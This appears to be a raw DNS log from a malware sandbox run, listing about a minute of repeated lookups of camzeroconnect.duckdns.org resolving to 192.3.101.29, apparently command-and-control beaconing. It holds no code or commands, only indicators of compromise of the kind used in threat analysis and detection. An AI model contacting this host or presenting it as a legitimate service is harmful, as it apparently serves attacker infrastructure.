                                                                                            Sep 27, 2024 14:01:38.001744986 CEST8.8.8.8192.168.2.220x37f7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:38.021466017 CEST8.8.8.8192.168.2.220x37f7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:38.034388065 CEST8.8.8.8192.168.2.220x37f7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:39.059739113 CEST8.8.8.8192.168.2.220x1e58No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:39.159255028 CEST8.8.8.8192.168.2.220x1e58No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:41.180591106 CEST8.8.8.8192.168.2.220x1e58No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:41.234006882 CEST8.8.8.8192.168.2.220x1e58No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:41.261784077 CEST8.8.8.8192.168.2.220x1e58No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.254195929 CEST8.8.8.8192.168.2.220x27cdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.261636019 CEST8.8.8.8192.168.2.220x27cdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.268680096 CEST8.8.8.8192.168.2.220x27cdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.279539108 CEST8.8.8.8192.168.2.220x27cdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.288510084 CEST8.8.8.8192.168.2.220x27cdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:43.314425945 CEST8.8.8.8192.168.2.220xe2d7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:43.324228048 CEST8.8.8.8192.168.2.220xe2d7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:45.334211111 CEST8.8.8.8192.168.2.220xe2d7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:45.341541052 CEST8.8.8.8192.168.2.220xe2d7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.355726957 CEST8.8.8.8192.168.2.220x82No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.364470005 CEST8.8.8.8192.168.2.220x82No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.372585058 CEST8.8.8.8192.168.2.220x82No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.381429911 CEST8.8.8.8192.168.2.220x82No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:48.331671000 CEST8.8.8.8192.168.2.220xe2d7Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:49.484607935 CEST8.8.8.8192.168.2.220x82No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.510662079 CEST8.8.8.8192.168.2.220x1206No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.517915010 CEST8.8.8.8192.168.2.220x1206No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.524514914 CEST8.8.8.8192.168.2.220x1206No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.556359053 CEST8.8.8.8192.168.2.220x1206No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.565166950 CEST8.8.8.8192.168.2.220x1206No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.595520973 CEST8.8.8.8192.168.2.220x8defNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.603665113 CEST8.8.8.8192.168.2.220x8defNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.612235069 CEST8.8.8.8192.168.2.220x8defNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.619903088 CEST8.8.8.8192.168.2.220x8defNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.626837969 CEST8.8.8.8192.168.2.220x8defServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.685030937 CEST8.8.8.8192.168.2.220x6856No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.692166090 CEST8.8.8.8192.168.2.220x6856No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.698729038 CEST8.8.8.8192.168.2.220x6856No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.705701113 CEST8.8.8.8192.168.2.220x6856No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.712663889 CEST8.8.8.8192.168.2.220x6856No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.732306004 CEST8.8.8.8192.168.2.220xf155No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.739619970 CEST8.8.8.8192.168.2.220xf155No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.747405052 CEST8.8.8.8192.168.2.220xf155No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.754637003 CEST8.8.8.8192.168.2.220xf155No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.761670113 CEST8.8.8.8192.168.2.220xf155No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:58.795722008 CEST8.8.8.8192.168.2.220x4747No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:59.811031103 CEST8.8.8.8192.168.2.220x4747No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:59.818664074 CEST8.8.8.8192.168.2.220x4747No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:59.826071024 CEST8.8.8.8192.168.2.220x4747No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.854823112 CEST8.8.8.8192.168.2.220xc59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.862396955 CEST8.8.8.8192.168.2.220xc59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.986066103 CEST8.8.8.8192.168.2.220xc59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.993362904 CEST8.8.8.8192.168.2.220xc59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.015757084 CEST8.8.8.8192.168.2.220xb9f9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.027157068 CEST8.8.8.8192.168.2.220xb9f9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.058372974 CEST8.8.8.8192.168.2.220xb9f9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.069689989 CEST8.8.8.8192.168.2.220xb9f9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.085854053 CEST8.8.8.8192.168.2.220xb9f9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.033365011 CEST8.8.8.8192.168.2.220x4747Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.264040947 CEST8.8.8.8192.168.2.220x4685No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.272073030 CEST8.8.8.8192.168.2.220x4685No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.278798103 CEST8.8.8.8192.168.2.220x4685No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.285340071 CEST8.8.8.8192.168.2.220x4685No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.293724060 CEST8.8.8.8192.168.2.220x4685No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.312244892 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.319056034 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.326452017 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.334017992 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.342823029 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:06.800004005 CEST8.8.8.8192.168.2.220xc59Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.080513954 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.089909077 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.100590944 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.108881950 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.119424105 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.155910015 CEST8.8.8.8192.168.2.220x7cb7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.162985086 CEST8.8.8.8192.168.2.220x7cb7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:10.270761013 CEST8.8.8.8192.168.2.220x7cb7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:10.289028883 CEST8.8.8.8192.168.2.220x7cb7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.417829037 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.425306082 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.433037043 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.440623999 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.154376030 CEST8.8.8.8192.168.2.220x7cb7Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.467782021 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.475064993 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.481853962 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.489291906 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.495903015 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.519996881 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.527364969 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.536453009 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.548146009 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.561284065 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.555946112 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.599407911 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.610790014 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.619100094 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.631732941 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.644714117 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.668685913 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.676539898 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.690076113 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.700191975 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.712657928 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.726962090 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.733617067 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.740940094 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.748574018 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.755320072 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.778495073 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.799374104 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.813419104 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.831449032 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.854410887 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.878428936 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.889507055 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.920315981 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.937869072 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.945465088 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:20.974731922 CEST8.8.8.8192.168.2.220xcd4fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:20.994302034 CEST8.8.8.8192.168.2.220xcd4fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.462201118 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.478538990 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.489877939 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.498716116 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.506505966 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.529395103 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.537921906 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.547296047 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.558698893 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.567609072 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.594616890 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.603899956 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.611955881 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.619211912 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.629544020 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.650341988 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.659401894 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.670885086 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.678873062 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.686944008 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.718914032 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.732901096 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.740436077 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.748317003 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.758771896 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.796268940 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.843225956 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.880785942 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.897290945 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:31.886224031 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:31.984044075 CEST8.8.8.8192.168.2.220xf3faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:31.993442059 CEST8.8.8.8192.168.2.220xf3faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:32.001693010 CEST8.8.8.8192.168.2.220xf3faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:35.975151062 CEST8.8.8.8192.168.2.220xf3faServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:36.995634079 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.002871037 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.008770943 CEST8.8.8.8192.168.2.220xf3faServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.010605097 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.017405987 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.024231911 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.036595106 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.044112921 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.052233934 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.059756041 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.067914009 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.081543922 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.088182926 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.095236063 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
